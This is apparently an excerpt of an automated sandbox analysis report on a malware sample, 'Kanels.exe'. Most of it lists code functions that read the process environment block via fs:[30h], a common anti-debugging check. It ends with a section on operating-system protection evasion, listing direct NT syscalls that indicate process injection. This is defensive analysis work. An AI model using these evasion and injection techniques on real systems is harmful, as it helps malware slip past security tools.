Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00710 mov eax, dword ptr fs:[00000030h] 7_2_22D00710
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C700 mov eax, dword ptr fs:[00000030h] 7_2_22D0C700
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0710 mov eax, dword ptr fs:[00000030h] 7_2_22CD0710
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4C730 mov eax, dword ptr fs:[00000030h] 7_2_22D4C730
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0273C mov eax, dword ptr fs:[00000030h] 7_2_22D0273C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0273C mov ecx, dword ptr fs:[00000030h] 7_2_22D0273C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C720 mov eax, dword ptr fs:[00000030h] 7_2_22D0C720
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD04E5 mov ecx, dword ptr fs:[00000030h] 7_2_22CD04E5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A49A mov eax, dword ptr fs:[00000030h] 7_2_22D8A49A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D044B0 mov ecx, dword ptr fs:[00000030h] 7_2_22D044B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5A4B0 mov eax, dword ptr fs:[00000030h] 7_2_22D5A4B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD64AB mov eax, dword ptr fs:[00000030h] 7_2_22CD64AB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A456 mov eax, dword ptr fs:[00000030h] 7_2_22D8A456
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC645D mov eax, dword ptr fs:[00000030h] 7_2_22CC645D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF245A mov eax, dword ptr fs:[00000030h] 7_2_22CF245A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C460 mov ecx, dword ptr fs:[00000030h] 7_2_22D5C460
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFA470 mov eax, dword ptr fs:[00000030h] 7_2_22CFA470
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08402 mov eax, dword ptr fs:[00000030h] 7_2_22D08402
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC427 mov eax, dword ptr fs:[00000030h] 7_2_22CCC427
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE420 mov eax, dword ptr fs:[00000030h] 7_2_22CCE420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A5D0 mov eax, dword ptr fs:[00000030h] 7_2_22D0A5D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD65D0 mov eax, dword ptr fs:[00000030h] 7_2_22CD65D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E5CF mov eax, dword ptr fs:[00000030h] 7_2_22D0E5CF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD25E0 mov eax, dword ptr fs:[00000030h] 7_2_22CD25E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C5ED mov eax, dword ptr fs:[00000030h] 7_2_22D0C5ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E59C mov eax, dword ptr fs:[00000030h] 7_2_22D0E59C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2582 mov eax, dword ptr fs:[00000030h] 7_2_22CD2582
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2582 mov ecx, dword ptr fs:[00000030h] 7_2_22CD2582
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04588 mov eax, dword ptr fs:[00000030h] 7_2_22D04588
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D505A7 mov eax, dword ptr fs:[00000030h] 7_2_22D505A7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF45B1 mov eax, dword ptr fs:[00000030h] 7_2_22CF45B1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8550 mov eax, dword ptr fs:[00000030h] 7_2_22CD8550
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0656A mov eax, dword ptr fs:[00000030h] 7_2_22D0656A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66500 mov eax, dword ptr fs:[00000030h] 7_2_22D66500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04AD0 mov eax, dword ptr fs:[00000030h] 7_2_22D04AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0AD0 mov eax, dword ptr fs:[00000030h] 7_2_22CD0AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26ACC mov eax, dword ptr fs:[00000030h] 7_2_22D26ACC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0AAEE mov eax, dword ptr fs:[00000030h] 7_2_22D0AAEE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08A90 mov edx, dword ptr fs:[00000030h] 7_2_22D08A90
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4A80 mov eax, dword ptr fs:[00000030h] 7_2_22DA4A80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8AA0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8AA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26AA4 mov eax, dword ptr fs:[00000030h] 7_2_22D26AA4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0A5B mov eax, dword ptr fs:[00000030h] 7_2_22CE0A5B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4CA72 mov eax, dword ptr fs:[00000030h] 7_2_22D4CA72
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EA60 mov eax, dword ptr fs:[00000030h] 7_2_22D7EA60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA6F mov eax, dword ptr fs:[00000030h] 7_2_22D0CA6F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5CA11 mov eax, dword ptr fs:[00000030h] 7_2_22D5CA11
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEA2E mov eax, dword ptr fs:[00000030h] 7_2_22CFEA2E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA24 mov eax, dword ptr fs:[00000030h] 7_2_22D0CA24
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF4A35 mov eax, dword ptr fs:[00000030h] 7_2_22CF4A35
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0BCD mov eax, dword ptr fs:[00000030h] 7_2_22CD0BCD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0BCB mov eax, dword ptr fs:[00000030h] 7_2_22CF0BCB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EBD0 mov eax, dword ptr fs:[00000030h] 7_2_22D7EBD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5CBF0 mov eax, dword ptr fs:[00000030h] 7_2_22D5CBF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEBFC mov eax, dword ptr fs:[00000030h] 7_2_22CFEBFC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84BB0 mov eax, dword ptr fs:[00000030h] 7_2_22D84BB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0BBE mov eax, dword ptr fs:[00000030h] 7_2_22CE0BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EB50 mov eax, dword ptr fs:[00000030h] 7_2_22D7EB50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA2B57 mov eax, dword ptr fs:[00000030h] 7_2_22DA2B57
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84B4B mov eax, dword ptr fs:[00000030h] 7_2_22D84B4B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84B4B mov eax, dword ptr fs:[00000030h] 7_2_22D84B4B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D78B42 mov eax, dword ptr fs:[00000030h] 7_2_22D78B42
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66B40 mov eax, dword ptr fs:[00000030h] 7_2_22D66B40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66B40 mov eax, dword ptr fs:[00000030h] 7_2_22D66B40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9AB40 mov eax, dword ptr fs:[00000030h] 7_2_22D9AB40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8B50 mov eax, dword ptr fs:[00000030h] 7_2_22CC8B50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCCB7E mov eax, dword ptr fs:[00000030h] 7_2_22CCCB7E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4EB1D mov eax, dword ptr fs:[00000030h] 7_2_22D4EB1D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4B00 mov eax, dword ptr fs:[00000030h] 7_2_22DA4B00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEB20 mov eax, dword ptr fs:[00000030h] 7_2_22CFEB20
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEB20 mov eax, dword ptr fs:[00000030h] 7_2_22CFEB20
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D98B28 mov eax, dword ptr fs:[00000030h] 7_2_22D98B28
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D98B28 mov eax, dword ptr fs:[00000030h] 7_2_22D98B28
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE8C0 mov eax, dword ptr fs:[00000030h] 7_2_22CFE8C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA08C0 mov eax, dword ptr fs:[00000030h] 7_2_22DA08C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_22D0C8F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_22D0C8F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A8E4 mov eax, dword ptr fs:[00000030h] 7_2_22D9A8E4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C89D mov eax, dword ptr fs:[00000030h] 7_2_22D5C89D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0887 mov eax, dword ptr fs:[00000030h] 7_2_22CD0887
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00854 mov eax, dword ptr fs:[00000030h] 7_2_22D00854
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE2840 mov ecx, dword ptr fs:[00000030h] 7_2_22CE2840
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4859 mov eax, dword ptr fs:[00000030h] 7_2_22CD4859
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4859 mov eax, dword ptr fs:[00000030h] 7_2_22CD4859
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66870 mov eax, dword ptr fs:[00000030h] 7_2_22D66870
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66870 mov eax, dword ptr fs:[00000030h] 7_2_22D66870
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E872 mov eax, dword ptr fs:[00000030h] 7_2_22D5E872
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E872 mov eax, dword ptr fs:[00000030h] 7_2_22D5E872
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C810 mov eax, dword ptr fs:[00000030h] 7_2_22D5C810
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A830 mov eax, dword ptr fs:[00000030h] 7_2_22D0A830
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7483A mov eax, dword ptr fs:[00000030h] 7_2_22D7483A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7483A mov eax, dword ptr fs:[00000030h] 7_2_22D7483A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov ecx, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2835 mov eax, dword ptr fs:[00000030h] 7_2_22CF2835
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D049D0 mov eax, dword ptr fs:[00000030h] 7_2_22D049D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A9D3 mov eax, dword ptr fs:[00000030h] 7_2_22D9A9D3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D669C0 mov eax, dword ptr fs:[00000030h] 7_2_22D669C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA9D0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA9D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D029F9 mov eax, dword ptr fs:[00000030h] 7_2_22D029F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D029F9 mov eax, dword ptr fs:[00000030h] 7_2_22D029F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E9E0 mov eax, dword ptr fs:[00000030h] 7_2_22D5E9E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD mov eax, dword ptr fs:[00000030h] 7_2_22CD09AD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD mov eax, dword ptr fs:[00000030h] 7_2_22CD09AD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov esi, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov eax, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D589B3 mov eax, dword ptr fs:[00000030h] 7_2_22D589B3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50946 mov eax, dword ptr fs:[00000030h] 7_2_22D50946
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4940 mov eax, dword ptr fs:[00000030h] 7_2_22DA4940
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C97C mov eax, dword ptr fs:[00000030h] 7_2_22D5C97C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 mov eax, dword ptr fs:[00000030h] 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74978 mov eax, dword ptr fs:[00000030h] 7_2_22D74978
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74978 mov eax, dword ptr fs:[00000030h] 7_2_22D74978
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E mov eax, dword ptr fs:[00000030h] 7_2_22D1096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenKeyEx: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryValueKey: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe NtReadFile: Direct from: 0x76F02ADC
